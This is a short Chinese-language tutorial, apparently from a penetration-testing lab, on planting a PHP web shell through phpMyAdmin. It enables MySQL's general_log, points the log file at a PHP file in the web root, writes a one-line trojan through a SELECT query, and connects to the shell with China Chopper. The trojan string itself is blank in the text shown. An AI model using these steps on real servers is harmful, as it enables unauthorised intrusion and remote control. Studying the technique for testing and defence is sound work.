general_log默认为关闭的，root权限开启后，general_log_file会保存所有的查询语句

所以可以开启general_log，然后设置general_log_file为一个php文件，最后用一句话木马进行查询来获取webshell

进入phpMyAdmin后在SQL处执行SQL语句

首先查看general log是否开启

show variables like 'general_log';

general log是关闭状态，执行SQL语句开启general log

set global general_log=on;

开启成功

然后把general_log_file设置为shell的绝对路径

SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/x.php';

创建的x.php里的内容

然后执行SQL查询语句

SELECT '
     ';

执行成功

看一下x.php里的内容

成功插入了一句话木马

用菜刀连接，看看是否能够解析的

 

连接成功